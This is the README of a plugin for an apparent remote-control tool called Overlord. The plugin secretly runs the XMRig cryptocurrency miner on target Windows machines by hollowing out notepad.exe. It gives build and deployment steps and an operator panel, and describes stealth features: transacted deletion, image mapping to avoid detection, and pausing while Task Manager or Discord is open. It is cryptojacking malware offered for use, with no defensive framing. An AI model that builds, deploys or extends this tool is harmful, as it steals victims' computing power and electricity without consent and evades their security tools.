CorvusMiner is an Overlord plugin that deploys XMRig cryptocurrency miner via process hollowing injection. It fetches xmrig from my corvusminer repo and injects it into notepad.exe using transacted hollowing for stealth.
- Navigate to System --> File Share page in Overlord UI
- Upload the xmrig from the plugin zip
- Copy the link for later use in the miner plugin
- Navigate to Plugins page in Overlord UI
- Click Upload Plugin
- Select
corvusminer.zip - Click Upload
- MinGW64 or any compiler if you know how to change it yourself
cd native
build.batThe build script:
- Compiles C++ source files with MinGW64 g++
- Outputs:
corvusminer-windows-amd64.dll
Create a plugin bundle for deployment:
corvusminer.zip
├── corvusminer-windows-amd64.dll
├── corvusminer.html
├── corvusminer.css
├── corvusminer.js
The plugin provides a simple mining control panel with the following inputs:
- Pool URL — Stratum mining pool endpoint (e.g.,
pool.example.com:3333) - Username (Wallet) — Your mining wallet address or username (required)
- Password — Mining pool password (defaults to "x" if empty)
- CPU Max Threads Hint (% of max) — Percentage of CPU threads to use (e.g., 50 = half of available cores)
- Block Mining if Running (comma-separated) — List of process names that will block mining when detected (e.g.,
taskmgr.exe,discord.exe)
- Start Mining — Deploys XMRig with the configured settings
- Stop Mining — Terminates the miner process
- Log — Real-time activity log showing injection status and mining events
- Process Hollowing — Creates a suspended notepad.exe process, maps the xmrig binary into its address space, redirects the entry point, and resumes execution
- Monitoring — Continuous thread monitors blocked processes; automatically restarts mining if blockers are removed
- Stealth — Uses transacted file deletion and SEC_IMAGE mapping to avoid detection